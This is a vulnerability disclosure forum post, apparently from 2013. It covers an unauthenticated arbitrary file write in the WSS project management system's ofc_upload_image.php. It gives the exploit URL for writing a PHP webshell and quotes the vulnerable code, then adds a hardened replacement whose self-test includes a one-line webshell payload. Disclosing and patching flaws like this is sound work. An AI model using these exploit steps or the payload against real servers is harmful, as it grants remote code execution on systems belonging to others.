WSS项目管理系统 (WSS project management system): POST get shell

楼主 (original poster), posted 2013-2-23 12:38:58
The vulnerable file writes the raw POST body to disk under whatever file name and extension the caller supplies.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php    (hfy.php is the file name that will be written)

POST arbitrary data as the request body
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The latest WSS release still ships this vulnerable file, even the paid edition; the demo deployed on the Sina app store has it too.
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// VULNERABLE: basename() only strips directory components; the extension
// (e.g. .php) comes straight from the client and is never checked.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// VULNERABLE: the raw request body is written verbatim, with no
// authentication and no check that it is actually an image.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
// Everything below exit() is dead code and never runs.
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>
Fix:
This vulnerable file is just a disaster. How to fix it? Add permission checks, extension checks and so on. Do it yourself.
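One way to apply those checks, written as an added example for this post rather than code from WSS or Open Flash Chart. It keeps the original contract (the file name arrives in the name query parameter, the image arrives as the raw request body) but removes everything the attack relies on: the caller no longer chooses the extension, the body must start with the PNG signature and end with an IEND chunk, the destination is resolved with realpath() and created with an exclusive open, and the web entry point refuses unauthenticated requests. The is_logged_in() session hook is hypothetical; substitute the application's real one. It reads the body from php://input because $HTTP_RAW_POST_DATA, which the original relies on, was removed in PHP 7.0. Run under the PHP CLI it exercises itself against a constructed 1x1 PNG and against the hfy.php webshell request from the post.

```php
<?php
// Hardened replacement for ofc_upload_image.php (added example, not the project's code).
// Original contract: GET name=<file> picks the name, raw POST body is the content.
// Here the client never controls the extension, the body must be a real PNG,
// and the web entry point requires an authenticated session.

declare(strict_types=1);

const OFC_UPLOAD_DIR = __DIR__ . '/../tmp-upload-images';  // must exist; serve it with PHP execution disabled
const OFC_MAX_BYTES  = 2 * 1024 * 1024;                    // chart images are small; cap the body

/**
 * Validate a chart image and store it under a server-chosen name.
 * Returns the absolute path written; throws RuntimeException on any violation.
 */
function save_chart_image(string $requested_name, string $body, string $dir): string
{
    // 1. Size and content: a PNG starts with the 8-byte signature and its last chunk is IEND.
    if ($body === '' || strlen($body) > OFC_MAX_BYTES) {
        throw new RuntimeException('bad size');
    }
    if (substr($body, 0, 8) !== "\x89PNG\r\n\x1a\n" || substr($body, -8, 4) !== 'IEND') {
        throw new RuntimeException('not a PNG');
    }

    // 2. Only the stem of the client-supplied name survives, reduced to a safe character set.
    $stem = pathinfo(basename($requested_name), PATHINFO_FILENAME);
    $stem = preg_replace('/[^A-Za-z0-9_-]/', '', $stem);
    if ($stem === '' || strlen($stem) > 40) {
        $stem = 'chart';
    }

    // 3. Server-controlled, unguessable name with a fixed extension.
    $name = $stem . '-' . bin2hex(random_bytes(8)) . '.png';

    // 4. The upload directory must already exist; no mkdir from request handling.
    $real_dir = realpath($dir);
    if ($real_dir === false || !is_dir($real_dir)) {
        throw new RuntimeException('upload dir missing');
    }
    $dest = $real_dir . DIRECTORY_SEPARATOR . $name;

    // 5. Exclusive create ('x' fails if the file exists), then a non-executable mode.
    $fh = fopen($dest, 'x');
    if ($fh === false) {
        throw new RuntimeException('cannot create file');
    }
    fwrite($fh, $body);
    fclose($fh);
    chmod($dest, 0644);
    return $dest;
}

if (PHP_SAPI !== 'cli') {
    // Web entry point: authenticate first. is_logged_in() is a hypothetical
    // application hook; wire up the real session check here.
    if (!function_exists('is_logged_in') || !is_logged_in()) {
        http_response_code(403);
        exit('forbidden');
    }
    try {
        // php://input replaces $HTTP_RAW_POST_DATA (removed in PHP 7.0).
        $saved = save_chart_image($_GET['name'] ?? '', (string) file_get_contents('php://input'), OFC_UPLOAD_DIR);
        echo 'Saved ' . basename($saved);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . $e->getMessage();
    }
} else {
    // CLI self-check with a constructed 1x1 PNG and the webshell request from the post.
    $dir = sys_get_temp_dir() . '/ofc-demo-' . getmypid();
    mkdir($dir, 0755, true);
    $png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');

    // Even with name=hfy.php the stored file is hfy-<random>.png.
    echo 'legit png : ', basename(save_chart_image('hfy.php', $png, $dir)), PHP_EOL;

    // The original attack: name=hfy.php with PHP source as the body. Rejected before any write.
    try {
        save_chart_image('hfy.php', '<?php system($_GET["c"]); ?>', $dir);
    } catch (RuntimeException $e) {
        echo 'webshell  : rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

Two deployment points matter as much as the code: tmp-upload-images must be created once at install time (the handler deliberately never calls mkdir, so a missing or misconfigured directory fails closed), and the web server should be configured so that nothing under it is executed as PHP, so a future bypass of the content check still only yields a static file. The signature and IEND checks stop the copy-and-paste webshell, not a polyglot; if the stored images are ever served back to browsers with a different content type, re-encode them with an image library instead of trusting the bytes.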
